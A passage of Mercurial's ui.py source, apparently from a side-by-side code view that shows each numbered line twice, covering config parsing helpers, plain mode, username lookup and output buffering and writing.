626 def configsuboptions(self, section, name, default=_unset, untrusted=False):
627 """Get a config option and all sub-options.
627 """Get a config option and all sub-options.
628
628
629 Some config options have sub-options that are declared with the
629 Some config options have sub-options that are declared with the
630 format "key:opt = value". This method is used to return the main
630 format "key:opt = value". This method is used to return the main
631 option and all its declared sub-options.
631 option and all its declared sub-options.
632
632
633 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
633 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
634 is a dict of defined sub-options where keys and values are strings.
634 is a dict of defined sub-options where keys and values are strings.
635 """
635 """
636 main = self.config(section, name, default, untrusted=untrusted)
636 main = self.config(section, name, default, untrusted=untrusted)
637 data = self._data(untrusted)
637 data = self._data(untrusted)
638 sub = {}
638 sub = {}
639 prefix = b'%s:' % name
639 prefix = b'%s:' % name
640 for k, v in data.items(section):
640 for k, v in data.items(section):
641 if k.startswith(prefix):
641 if k.startswith(prefix):
642 sub[k[len(prefix) :]] = v
642 sub[k[len(prefix) :]] = v
643
643
644 if self.debugflag and not untrusted and self._reportuntrusted:
644 if self.debugflag and not untrusted and self._reportuntrusted:
645 for k, v in sub.items():
645 for k, v in sub.items():
646 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
646 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
647 if uvalue is not None and uvalue != v:
647 if uvalue is not None and uvalue != v:
648 self.debug(
648 self.debug(
649 b'ignoring untrusted configuration option '
649 b'ignoring untrusted configuration option '
650 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
650 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
651 )
651 )
652
652
653 return main, sub
653 return main, sub
654
654
655 def configpath(self, section, name, default=_unset, untrusted=False):
655 def configpath(self, section, name, default=_unset, untrusted=False):
656 """get a path config item, expanded relative to repo root or config
656 """get a path config item, expanded relative to repo root or config
657 file"""
657 file"""
658 v = self.config(section, name, default, untrusted)
658 v = self.config(section, name, default, untrusted)
659 if v is None:
659 if v is None:
660 return None
660 return None
661 if not os.path.isabs(v) or b"://" not in v:
661 if not os.path.isabs(v) or b"://" not in v:
662 src = self.configsource(section, name, untrusted)
662 src = self.configsource(section, name, untrusted)
663 if b':' in src:
663 if b':' in src:
664 base = os.path.dirname(src.rsplit(b':')[0])
664 base = os.path.dirname(src.rsplit(b':')[0])
665 v = os.path.join(base, os.path.expanduser(v))
665 v = os.path.join(base, os.path.expanduser(v))
666 return v
666 return v
667
667
668 def configbool(self, section, name, default=_unset, untrusted=False):
668 def configbool(self, section, name, default=_unset, untrusted=False):
669 """parse a configuration element as a boolean
669 """parse a configuration element as a boolean
670
670
671 >>> u = ui(); s = b'foo'
671 >>> u = ui(); s = b'foo'
672 >>> u.setconfig(s, b'true', b'yes')
672 >>> u.setconfig(s, b'true', b'yes')
673 >>> u.configbool(s, b'true')
673 >>> u.configbool(s, b'true')
674 True
674 True
675 >>> u.setconfig(s, b'false', b'no')
675 >>> u.setconfig(s, b'false', b'no')
676 >>> u.configbool(s, b'false')
676 >>> u.configbool(s, b'false')
677 False
677 False
678 >>> u.configbool(s, b'unknown')
678 >>> u.configbool(s, b'unknown')
679 False
679 False
680 >>> u.configbool(s, b'unknown', True)
680 >>> u.configbool(s, b'unknown', True)
681 True
681 True
682 >>> u.setconfig(s, b'invalid', b'somevalue')
682 >>> u.setconfig(s, b'invalid', b'somevalue')
683 >>> u.configbool(s, b'invalid')
683 >>> u.configbool(s, b'invalid')
684 Traceback (most recent call last):
684 Traceback (most recent call last):
685 ...
685 ...
686 ConfigError: foo.invalid is not a boolean ('somevalue')
686 ConfigError: foo.invalid is not a boolean ('somevalue')
687 """
687 """
688
688
689 v = self._config(section, name, default, untrusted=untrusted)
689 v = self._config(section, name, default, untrusted=untrusted)
690 if v is None:
690 if v is None:
691 return v
691 return v
692 if v is _unset:
692 if v is _unset:
693 if default is _unset:
693 if default is _unset:
694 return False
694 return False
695 return default
695 return default
696 if isinstance(v, bool):
696 if isinstance(v, bool):
697 return v
697 return v
698 b = stringutil.parsebool(v)
698 b = stringutil.parsebool(v)
699 if b is None:
699 if b is None:
700 raise error.ConfigError(
700 raise error.ConfigError(
701 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
701 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
702 )
702 )
703 return b
703 return b
704
704
705 def configwith(
705 def configwith(
706 self, convert, section, name, default=_unset, desc=None, untrusted=False
706 self, convert, section, name, default=_unset, desc=None, untrusted=False
707 ):
707 ):
708 """parse a configuration element with a conversion function
708 """parse a configuration element with a conversion function
709
709
710 >>> u = ui(); s = b'foo'
710 >>> u = ui(); s = b'foo'
711 >>> u.setconfig(s, b'float1', b'42')
711 >>> u.setconfig(s, b'float1', b'42')
712 >>> u.configwith(float, s, b'float1')
712 >>> u.configwith(float, s, b'float1')
713 42.0
713 42.0
714 >>> u.setconfig(s, b'float2', b'-4.25')
714 >>> u.setconfig(s, b'float2', b'-4.25')
715 >>> u.configwith(float, s, b'float2')
715 >>> u.configwith(float, s, b'float2')
716 -4.25
716 -4.25
717 >>> u.configwith(float, s, b'unknown', 7)
717 >>> u.configwith(float, s, b'unknown', 7)
718 7.0
718 7.0
719 >>> u.setconfig(s, b'invalid', b'somevalue')
719 >>> u.setconfig(s, b'invalid', b'somevalue')
720 >>> u.configwith(float, s, b'invalid')
720 >>> u.configwith(float, s, b'invalid')
721 Traceback (most recent call last):
721 Traceback (most recent call last):
722 ...
722 ...
723 ConfigError: foo.invalid is not a valid float ('somevalue')
723 ConfigError: foo.invalid is not a valid float ('somevalue')
724 >>> u.configwith(float, s, b'invalid', desc=b'womble')
724 >>> u.configwith(float, s, b'invalid', desc=b'womble')
725 Traceback (most recent call last):
725 Traceback (most recent call last):
726 ...
726 ...
727 ConfigError: foo.invalid is not a valid womble ('somevalue')
727 ConfigError: foo.invalid is not a valid womble ('somevalue')
728 """
728 """
729
729
730 v = self.config(section, name, default, untrusted)
730 v = self.config(section, name, default, untrusted)
731 if v is None:
731 if v is None:
732 return v # do not attempt to convert None
732 return v # do not attempt to convert None
733 try:
733 try:
734 return convert(v)
734 return convert(v)
735 except (ValueError, error.ParseError):
735 except (ValueError, error.ParseError):
736 if desc is None:
736 if desc is None:
737 desc = pycompat.sysbytes(convert.__name__)
737 desc = pycompat.sysbytes(convert.__name__)
738 raise error.ConfigError(
738 raise error.ConfigError(
739 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
739 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
740 )
740 )
741
741
742 def configint(self, section, name, default=_unset, untrusted=False):
742 def configint(self, section, name, default=_unset, untrusted=False):
743 """parse a configuration element as an integer
743 """parse a configuration element as an integer
744
744
745 >>> u = ui(); s = b'foo'
745 >>> u = ui(); s = b'foo'
746 >>> u.setconfig(s, b'int1', b'42')
746 >>> u.setconfig(s, b'int1', b'42')
747 >>> u.configint(s, b'int1')
747 >>> u.configint(s, b'int1')
748 42
748 42
749 >>> u.setconfig(s, b'int2', b'-42')
749 >>> u.setconfig(s, b'int2', b'-42')
750 >>> u.configint(s, b'int2')
750 >>> u.configint(s, b'int2')
751 -42
751 -42
752 >>> u.configint(s, b'unknown', 7)
752 >>> u.configint(s, b'unknown', 7)
753 7
753 7
754 >>> u.setconfig(s, b'invalid', b'somevalue')
754 >>> u.setconfig(s, b'invalid', b'somevalue')
755 >>> u.configint(s, b'invalid')
755 >>> u.configint(s, b'invalid')
756 Traceback (most recent call last):
756 Traceback (most recent call last):
757 ...
757 ...
758 ConfigError: foo.invalid is not a valid integer ('somevalue')
758 ConfigError: foo.invalid is not a valid integer ('somevalue')
759 """
759 """
760
760
761 return self.configwith(
761 return self.configwith(
762 int, section, name, default, b'integer', untrusted
762 int, section, name, default, b'integer', untrusted
763 )
763 )
764
764
765 def configbytes(self, section, name, default=_unset, untrusted=False):
765 def configbytes(self, section, name, default=_unset, untrusted=False):
766 """parse a configuration element as a quantity in bytes
766 """parse a configuration element as a quantity in bytes
767
767
768 Units can be specified as b (bytes), k or kb (kilobytes), m or
768 Units can be specified as b (bytes), k or kb (kilobytes), m or
769 mb (megabytes), g or gb (gigabytes).
769 mb (megabytes), g or gb (gigabytes).
770
770
771 >>> u = ui(); s = b'foo'
771 >>> u = ui(); s = b'foo'
772 >>> u.setconfig(s, b'val1', b'42')
772 >>> u.setconfig(s, b'val1', b'42')
773 >>> u.configbytes(s, b'val1')
773 >>> u.configbytes(s, b'val1')
774 42
774 42
775 >>> u.setconfig(s, b'val2', b'42.5 kb')
775 >>> u.setconfig(s, b'val2', b'42.5 kb')
776 >>> u.configbytes(s, b'val2')
776 >>> u.configbytes(s, b'val2')
777 43520
777 43520
778 >>> u.configbytes(s, b'unknown', b'7 MB')
778 >>> u.configbytes(s, b'unknown', b'7 MB')
779 7340032
779 7340032
780 >>> u.setconfig(s, b'invalid', b'somevalue')
780 >>> u.setconfig(s, b'invalid', b'somevalue')
781 >>> u.configbytes(s, b'invalid')
781 >>> u.configbytes(s, b'invalid')
782 Traceback (most recent call last):
782 Traceback (most recent call last):
783 ...
783 ...
784 ConfigError: foo.invalid is not a byte quantity ('somevalue')
784 ConfigError: foo.invalid is not a byte quantity ('somevalue')
785 """
785 """
786
786
787 value = self._config(section, name, default, untrusted)
787 value = self._config(section, name, default, untrusted)
788 if value is _unset:
788 if value is _unset:
789 if default is _unset:
789 if default is _unset:
790 default = 0
790 default = 0
791 value = default
791 value = default
792 if not isinstance(value, bytes):
792 if not isinstance(value, bytes):
793 return value
793 return value
794 try:
794 try:
795 return util.sizetoint(value)
795 return util.sizetoint(value)
796 except error.ParseError:
796 except error.ParseError:
797 raise error.ConfigError(
797 raise error.ConfigError(
798 _(b"%s.%s is not a byte quantity ('%s')")
798 _(b"%s.%s is not a byte quantity ('%s')")
799 % (section, name, value)
799 % (section, name, value)
800 )
800 )
801
801
802 def configlist(self, section, name, default=_unset, untrusted=False):
802 def configlist(self, section, name, default=_unset, untrusted=False):
803 """parse a configuration element as a list of comma/space separated
803 """parse a configuration element as a list of comma/space separated
804 strings
804 strings
805
805
806 >>> u = ui(); s = b'foo'
806 >>> u = ui(); s = b'foo'
807 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
807 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
808 >>> u.configlist(s, b'list1')
808 >>> u.configlist(s, b'list1')
809 ['this', 'is', 'a small', 'test']
809 ['this', 'is', 'a small', 'test']
810 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
810 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
811 >>> u.configlist(s, b'list2')
811 >>> u.configlist(s, b'list2')
812 ['this', 'is', 'a small', 'test']
812 ['this', 'is', 'a small', 'test']
813 """
813 """
814 # default is not always a list
814 # default is not always a list
815 v = self.configwith(
815 v = self.configwith(
816 config.parselist, section, name, default, b'list', untrusted
816 config.parselist, section, name, default, b'list', untrusted
817 )
817 )
818 if isinstance(v, bytes):
818 if isinstance(v, bytes):
819 return config.parselist(v)
819 return config.parselist(v)
820 elif v is None:
820 elif v is None:
821 return []
821 return []
822 return v
822 return v
823
823
824 def configdate(self, section, name, default=_unset, untrusted=False):
824 def configdate(self, section, name, default=_unset, untrusted=False):
825 """parse a configuration element as a tuple of ints
825 """parse a configuration element as a tuple of ints
826
826
827 >>> u = ui(); s = b'foo'
827 >>> u = ui(); s = b'foo'
828 >>> u.setconfig(s, b'date', b'0 0')
828 >>> u.setconfig(s, b'date', b'0 0')
829 >>> u.configdate(s, b'date')
829 >>> u.configdate(s, b'date')
830 (0, 0)
830 (0, 0)
831 """
831 """
832 if self.config(section, name, default, untrusted):
832 if self.config(section, name, default, untrusted):
833 return self.configwith(
833 return self.configwith(
834 dateutil.parsedate, section, name, default, b'date', untrusted
834 dateutil.parsedate, section, name, default, b'date', untrusted
835 )
835 )
836 if default is _unset:
836 if default is _unset:
837 return None
837 return None
838 return default
838 return default
839
839
840 def configdefault(self, section, name):
840 def configdefault(self, section, name):
841 """returns the default value of the config item"""
841 """returns the default value of the config item"""
842 item = self._knownconfig.get(section, {}).get(name)
842 item = self._knownconfig.get(section, {}).get(name)
843 itemdefault = None
843 itemdefault = None
844 if item is not None:
844 if item is not None:
845 if callable(item.default):
845 if callable(item.default):
846 itemdefault = item.default()
846 itemdefault = item.default()
847 else:
847 else:
848 itemdefault = item.default
848 itemdefault = item.default
849 return itemdefault
849 return itemdefault
850
850
851 def hasconfig(self, section, name, untrusted=False):
851 def hasconfig(self, section, name, untrusted=False):
852 return self._data(untrusted).hasitem(section, name)
852 return self._data(untrusted).hasitem(section, name)
853
853
854 def has_section(self, section, untrusted=False):
854 def has_section(self, section, untrusted=False):
855 '''tell whether section exists in config.'''
855 '''tell whether section exists in config.'''
856 return section in self._data(untrusted)
856 return section in self._data(untrusted)
857
857
858 def configitems(self, section, untrusted=False, ignoresub=False):
858 def configitems(self, section, untrusted=False, ignoresub=False):
859 items = self._data(untrusted).items(section)
859 items = self._data(untrusted).items(section)
860 if ignoresub:
860 if ignoresub:
861 items = [i for i in items if b':' not in i[0]]
861 items = [i for i in items if b':' not in i[0]]
862 if self.debugflag and not untrusted and self._reportuntrusted:
862 if self.debugflag and not untrusted and self._reportuntrusted:
863 for k, v in self._ucfg.items(section):
863 for k, v in self._ucfg.items(section):
864 if self._tcfg.get(section, k) != v:
864 if self._tcfg.get(section, k) != v:
865 self.debug(
865 self.debug(
866 b"ignoring untrusted configuration option "
866 b"ignoring untrusted configuration option "
867 b"%s.%s = %s\n" % (section, k, v)
867 b"%s.%s = %s\n" % (section, k, v)
868 )
868 )
869 return items
869 return items
870
870
871 def walkconfig(self, untrusted=False):
871 def walkconfig(self, untrusted=False):
872 cfg = self._data(untrusted)
872 cfg = self._data(untrusted)
873 for section in cfg.sections():
873 for section in cfg.sections():
874 for name, value in self.configitems(section, untrusted):
874 for name, value in self.configitems(section, untrusted):
875 yield section, name, value
875 yield section, name, value
876
876
877 def plain(self, feature=None):
877 def plain(self, feature=None):
878 '''is plain mode active?
878 '''is plain mode active?
879
879
880 Plain mode means that all configuration variables which affect
880 Plain mode means that all configuration variables which affect
881 the behavior and output of Mercurial should be
881 the behavior and output of Mercurial should be
882 ignored. Additionally, the output should be stable,
882 ignored. Additionally, the output should be stable,
883 reproducible and suitable for use in scripts or applications.
883 reproducible and suitable for use in scripts or applications.
884
884
885 The only way to trigger plain mode is by setting either the
885 The only way to trigger plain mode is by setting either the
886 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
886 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
887
887
888 The return value can either be
888 The return value can either be
889 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
889 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
890 - False if feature is disabled by default and not included in HGPLAIN
890 - False if feature is disabled by default and not included in HGPLAIN
891 - True otherwise
891 - True otherwise
892 '''
892 '''
893 if (
893 if (
894 b'HGPLAIN' not in encoding.environ
894 b'HGPLAIN' not in encoding.environ
895 and b'HGPLAINEXCEPT' not in encoding.environ
895 and b'HGPLAINEXCEPT' not in encoding.environ
896 ):
896 ):
897 return False
897 return False
898 exceptions = (
898 exceptions = (
899 encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
899 encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
900 )
900 )
901 # TODO: add support for HGPLAIN=+feature,-feature syntax
901 # TODO: add support for HGPLAIN=+feature,-feature syntax
902 if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
902 if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
903 b','
903 b','
904 ):
904 ):
905 exceptions.append(b'strictflags')
905 exceptions.append(b'strictflags')
906 if feature and exceptions:
906 if feature and exceptions:
907 return feature not in exceptions
907 return feature not in exceptions
908 return True
908 return True
909
909
910 def username(self, acceptempty=False):
910 def username(self, acceptempty=False):
911 """Return default username to be used in commits.
911 """Return default username to be used in commits.
912
912
913 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
913 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
914 and stop searching if one of these is set.
914 and stop searching if one of these is set.
915 If not found and acceptempty is True, returns None.
915 If not found and acceptempty is True, returns None.
916 If not found and ui.askusername is True, ask the user, else use
916 If not found and ui.askusername is True, ask the user, else use
917 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
917 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
918 If no username could be found, raise an Abort error.
918 If no username could be found, raise an Abort error.
919 """
919 """
920 user = encoding.environ.get(b"HGUSER")
920 user = encoding.environ.get(b"HGUSER")
921 if user is None:
921 if user is None:
922 user = self.config(b"ui", b"username")
922 user = self.config(b"ui", b"username")
923 if user is not None:
923 if user is not None:
924 user = os.path.expandvars(user)
924 user = os.path.expandvars(user)
925 if user is None:
925 if user is None:
926 user = encoding.environ.get(b"EMAIL")
926 user = encoding.environ.get(b"EMAIL")
927 if user is None and acceptempty:
927 if user is None and acceptempty:
928 return user
928 return user
929 if user is None and self.configbool(b"ui", b"askusername"):
929 if user is None and self.configbool(b"ui", b"askusername"):
930 user = self.prompt(_(b"enter a commit username:"), default=None)
930 user = self.prompt(_(b"enter a commit username:"), default=None)
931 if user is None and not self.interactive():
931 if user is None and not self.interactive():
932 try:
932 try:
933 user = b'%s@%s' % (
933 user = b'%s@%s' % (
934 procutil.getuser(),
934 procutil.getuser(),
935 encoding.strtolocal(socket.getfqdn()),
935 encoding.strtolocal(socket.getfqdn()),
936 )
936 )
937 self.warn(_(b"no username found, using '%s' instead\n") % user)
937 self.warn(_(b"no username found, using '%s' instead\n") % user)
938 except KeyError:
938 except KeyError:
939 pass
939 pass
940 if not user:
940 if not user:
941 raise error.Abort(
941 raise error.Abort(
942 _(b'no username supplied'),
942 _(b'no username supplied'),
943 hint=_(b"use 'hg config --edit' " b'to set your username'),
943 hint=_(b"use 'hg config --edit' " b'to set your username'),
944 )
944 )
945 if b"\n" in user:
945 if b"\n" in user:
946 raise error.Abort(
946 raise error.Abort(
947 _(b"username %r contains a newline\n") % pycompat.bytestr(user)
947 _(b"username %r contains a newline\n") % pycompat.bytestr(user)
948 )
948 )
949 return user
949 return user
950
950
951 def shortuser(self, user):
951 def shortuser(self, user):
952 """Return a short representation of a user name or email address."""
952 """Return a short representation of a user name or email address."""
953 if not self.verbose:
953 if not self.verbose:
954 user = stringutil.shortuser(user)
954 user = stringutil.shortuser(user)
955 return user
955 return user
956
956
957 def expandpath(self, loc, default=None):
957 def expandpath(self, loc, default=None):
958 """Return repository location relative to cwd or from [paths]"""
958 """Return repository location relative to cwd or from [paths]"""
959 try:
959 try:
960 p = self.paths.getpath(loc)
960 p = self.paths.getpath(loc)
961 if p:
961 if p:
962 return p.rawloc
962 return p.rawloc
963 except error.RepoError:
963 except error.RepoError:
964 pass
964 pass
965
965
966 if default:
966 if default:
967 try:
967 try:
968 p = self.paths.getpath(default)
968 p = self.paths.getpath(default)
969 if p:
969 if p:
970 return p.rawloc
970 return p.rawloc
971 except error.RepoError:
971 except error.RepoError:
972 pass
972 pass
973
973
974 return loc
974 return loc
975
975
976 @util.propertycache
976 @util.propertycache
977 def paths(self):
977 def paths(self):
978 return paths(self)
978 return paths(self)
979
979
980 @property
980 @property
981 def fout(self):
981 def fout(self):
982 return self._fout
982 return self._fout
983
983
984 @fout.setter
984 @fout.setter
985 def fout(self, f):
985 def fout(self, f):
986 self._fout = f
986 self._fout = f
987 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
987 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
988
988
989 @property
989 @property
990 def ferr(self):
990 def ferr(self):
991 return self._ferr
991 return self._ferr
992
992
993 @ferr.setter
993 @ferr.setter
994 def ferr(self, f):
994 def ferr(self, f):
995 self._ferr = f
995 self._ferr = f
996 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
996 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
997
997
998 @property
998 @property
999 def fin(self):
999 def fin(self):
1000 return self._fin
1000 return self._fin
1001
1001
1002 @fin.setter
1002 @fin.setter
1003 def fin(self, f):
1003 def fin(self, f):
1004 self._fin = f
1004 self._fin = f
1005
1005
1006 @property
1006 @property
1007 def fmsg(self):
1007 def fmsg(self):
1008 """Stream dedicated for status/error messages; may be None if
1008 """Stream dedicated for status/error messages; may be None if
1009 fout/ferr are used"""
1009 fout/ferr are used"""
1010 return self._fmsg
1010 return self._fmsg
1011
1011
1012 @fmsg.setter
1012 @fmsg.setter
1013 def fmsg(self, f):
1013 def fmsg(self, f):
1014 self._fmsg = f
1014 self._fmsg = f
1015 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1015 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1016
1016
1017 def pushbuffer(self, error=False, subproc=False, labeled=False):
1017 def pushbuffer(self, error=False, subproc=False, labeled=False):
1018 """install a buffer to capture standard output of the ui object
1018 """install a buffer to capture standard output of the ui object
1019
1019
1020 If error is True, the error output will be captured too.
1020 If error is True, the error output will be captured too.
1021
1021
1022 If subproc is True, output from subprocesses (typically hooks) will be
1022 If subproc is True, output from subprocesses (typically hooks) will be
1023 captured too.
1023 captured too.
1024
1024
1025 If labeled is True, any labels associated with buffered
1025 If labeled is True, any labels associated with buffered
1026 output will be handled. By default, this has no effect
1026 output will be handled. By default, this has no effect
1027 on the output returned, but extensions and GUI tools may
1027 on the output returned, but extensions and GUI tools may
1028 handle this argument and returned styled output. If output
1028 handle this argument and returned styled output. If output
1029 is being buffered so it can be captured and parsed or
1029 is being buffered so it can be captured and parsed or
1030 processed, labeled should not be set to True.
1030 processed, labeled should not be set to True.
1031 """
1031 """
1032 self._buffers.append([])
1032 self._buffers.append([])
1033 self._bufferstates.append((error, subproc, labeled))
1033 self._bufferstates.append((error, subproc, labeled))
1034 self._bufferapplylabels = labeled
1034 self._bufferapplylabels = labeled
1035
1035
1036 def popbuffer(self):
1036 def popbuffer(self):
1037 '''pop the last buffer and return the buffered output'''
1037 '''pop the last buffer and return the buffered output'''
1038 self._bufferstates.pop()
1038 self._bufferstates.pop()
1039 if self._bufferstates:
1039 if self._bufferstates:
1040 self._bufferapplylabels = self._bufferstates[-1][2]
1040 self._bufferapplylabels = self._bufferstates[-1][2]
1041 else:
1041 else:
1042 self._bufferapplylabels = None
1042 self._bufferapplylabels = None
1043
1043
1044 return b"".join(self._buffers.pop())
1044 return b"".join(self._buffers.pop())
1045
1045
1046 def _isbuffered(self, dest):
1046 def _isbuffered(self, dest):
1047 if dest is self._fout:
1047 if dest is self._fout:
1048 return bool(self._buffers)
1048 return bool(self._buffers)
1049 if dest is self._ferr:
1049 if dest is self._ferr:
1050 return bool(self._bufferstates and self._bufferstates[-1][0])
1050 return bool(self._bufferstates and self._bufferstates[-1][0])
1051 return False
1051 return False
1052
1052
1053 def canwritewithoutlabels(self):
1053 def canwritewithoutlabels(self):
1054 '''check if write skips the label'''
1054 '''check if write skips the label'''
1055 if self._buffers and not self._bufferapplylabels:
1055 if self._buffers and not self._bufferapplylabels:
1056 return True
1056 return True
1057 return self._colormode is None
1057 return self._colormode is None
1058
1058
1059 def canbatchlabeledwrites(self):
1059 def canbatchlabeledwrites(self):
1060 '''check if write calls with labels are batchable'''
1060 '''check if write calls with labels are batchable'''
1061 # Windows color printing is special, see ``write``.
1061 # Windows color printing is special, see ``write``.
1062 return self._colormode != b'win32'
1062 return self._colormode != b'win32'
1063
1063
1064 def write(self, *args, **opts):
1064 def write(self, *args, **opts):
1065 '''write args to output
1065 '''write args to output
1066
1066
1067 By default, this method simply writes to the buffer or stdout.
1067 By default, this method simply writes to the buffer or stdout.
1068 Color mode can be set on the UI class to have the output decorated
1068 Color mode can be set on the UI class to have the output decorated
1069 with color modifier before being written to stdout.
1069 with color modifier before being written to stdout.
1070
1070
1071 The color used is controlled by an optional keyword argument, "label".
1071 The color used is controlled by an optional keyword argument, "label".
1072 This should be a string containing label names separated by space.
1072 This should be a string containing label names separated by space.
1073 Label names take the form of "topic.type". For example, ui.debug()
1073 Label names take the form of "topic.type". For example, ui.debug()
1074 issues a label of "ui.debug".
1074 issues a label of "ui.debug".
1075
1075
1076 Progress reports via stderr are normally cleared before writing as
1076 Progress reports via stderr are normally cleared before writing as
1077 stdout and stderr go to the same terminal. This can be skipped with
1077 stdout and stderr go to the same terminal. This can be skipped with
1078 the optional keyword argument "keepprogressbar". The progress bar
1078 the optional keyword argument "keepprogressbar". The progress bar
1079 will continue to occupy a partial line on stderr in that case.
1079 will continue to occupy a partial line on stderr in that case.
1080 This functionality is intended when Mercurial acts as data source
1080 This functionality is intended when Mercurial acts as data source
1081 in a pipe.
1081 in a pipe.
1082
1082
1083 When labeling output for a specific command, a label of
1083 When labeling output for a specific command, a label of
1084 "cmdname.type" is recommended. For example, status issues
1084 "cmdname.type" is recommended. For example, status issues
1085 a label of "status.modified" for modified files.
1085 a label of "status.modified" for modified files.
1086 '''
1086 '''
1087 dest = self._fout
1087 dest = self._fout
1088
1088
1089 # inlined _write() for speed
1089 # inlined _write() for speed
1090 if self._buffers:
1090 if self._buffers:
1091 label = opts.get('label', b'')
1091 label = opts.get('label', b'')
1092 if label and self._bufferapplylabels:
1092 if label and self._bufferapplylabels:
1093 self._buffers[-1].extend(self.label(a, label) for a in args)
1093 self._buffers[-1].extend(self.label(a, label) for a in args)
1094 else:
1094 else:
1095 self._buffers[-1].extend(args)
1095 self._buffers[-1].extend(args)
1096 return
1096 return
1097
1097
1098 # inlined _writenobuf() for speed
1098 # inlined _writenobuf() for speed
1099 if not opts.get('keepprogressbar', False):
1099 if not opts.get('keepprogressbar', False):
1100 self._progclear()
1100 self._progclear()
1101 msg = b''.join(args)
1101 msg = b''.join(args)
1102
1102
1103 # opencode timeblockedsection because this is a critical path
1103 # opencode timeblockedsection because this is a critical path
1104 starttime = util.timer()
1104 starttime = util.timer()
1105 try:
1105 try:
1106 if self._colormode == b'win32':
1106 if self._colormode == b'win32':
1107 # windows color printing is its own can of crab, defer to
1107 # windows color printing is its own can of crab, defer to
1108 # the color module and that is it.
1108 # the color module and that is it.
1109 color.win32print(self, dest.write, msg, **opts)
1109 color.win32print(self, dest.write, msg, **opts)
1110 else:
1110 else:
1111 if self._colormode is not None:
1111 if self._colormode is not None:
1112 label = opts.get('label', b'')
1112 label = opts.get('label', b'')
1113 msg = self.label(msg, label)
1113 msg = self.label(msg, label)
1114 dest.write(msg)
1114 dest.write(msg)
1115 except IOError as err:
1115 except IOError as err:
1116 raise error.StdioError(err)
1116 raise error.StdioError(err)
1117 finally:
1117 finally:
1118 self._blockedtimes[b'stdio_blocked'] += (
1118 self._blockedtimes[b'stdio_blocked'] += (
1119 util.timer() - starttime
1119 util.timer() - starttime
1120 ) * 1000
1120 ) * 1000
1121
1121
1122 def write_err(self, *args, **opts):
1122 def write_err(self, *args, **opts):
1123 self._write(self._ferr, *args, **opts)
1123 self._write(self._ferr, *args, **opts)
1124
1124
1125 def _write(self, dest, *args, **opts):
1125 def _write(self, dest, *args, **opts):
1126 # update write() as well if you touch this code
1126 # update write() as well if you touch this code
1127 if self._isbuffered(dest):
1127 if self._isbuffered(dest):
1128 label = opts.get('label', b'')
1128 label = opts.get('label', b'')
1129 if label and self._bufferapplylabels:
1129 if label and self._bufferapplylabels:
1130 self._buffers[-1].extend(self.label(a, label) for a in args)
1130 self._buffers[-1].extend(self.label(a, label) for a in args)
1131 else:
1131 else:
1132 self._buffers[-1].extend(args)
1132 self._buffers[-1].extend(args)
1133 else:
1133 else:
1134 self._writenobuf(dest, *args, **opts)
1134 self._writenobuf(dest, *args, **opts)
1135
1135
1136 def _writenobuf(self, dest, *args, **opts):
1136 def _writenobuf(self, dest, *args, **opts):
1137 # update write() as well if you touch this code
1137 # update write() as well if you touch this code
1138 if not opts.get('keepprogressbar', False):
1138 if not opts.get('keepprogressbar', False):
1139 self._progclear()
1139 self._progclear()
1140 msg = b''.join(args)
1140 msg = b''.join(args)
1141
1141
1142 # opencode timeblockedsection because this is a critical path
1142 # opencode timeblockedsection because this is a critical path
1143 starttime = util.timer()
1143 starttime = util.timer()
1144 try:
1144 try:
1145 if dest is self._ferr and not getattr(self._fout, 'closed', False):
1145 if dest is self._ferr and not getattr(self._fout, 'closed', False):
1146 self._fout.flush()
1146 self._fout.flush()
1147 if getattr(dest, 'structured', False):
1147 if getattr(dest, 'structured', False):
1148 # channel for machine-readable output with metadata, where
1148 # channel for machine-readable output with metadata, where
1149 # no extra colorization is necessary.
1149 # no extra colorization is necessary.
1150 dest.write(msg, **opts)
1150 dest.write(msg, **opts)
1151 elif self._colormode == b'win32':
1151 elif self._colormode == b'win32':
1152 # windows color printing is its own can of crab, defer to
1152 # windows color printing is its own can of crab, defer to
1153 # the color module and that is it.
1153 # the color module and that is it.
1154 color.win32print(self, dest.write, msg, **opts)
1154 color.win32print(self, dest.write, msg, **opts)
1155 else:
1155 else:
1156 if self._colormode is not None:
1156 if self._colormode is not None:
1157 label = opts.get('label', b'')
1157 label = opts.get('label', b'')
1158 msg = self.label(msg, label)
1158 msg = self.label(msg, label)
1159 dest.write(msg)
1159 dest.write(msg)
1160 # stderr may be buffered under win32 when redirected to files,
1160 # stderr may be buffered under win32 when redirected to files,
1161 # including stdout.
1161 # including stdout.
1162 if dest is self._ferr and not getattr(self._ferr, 'closed', False):
1162 if dest is self._ferr and not getattr(self._ferr, 'closed', False):
1163 dest.flush()
1163 dest.flush()
1164 except IOError as err:
1164 except IOError as err:
1165 if dest is self._ferr and err.errno in (
1165 if dest is self._ferr and err.errno in (
1166 errno.EPIPE,
1166 errno.EPIPE,
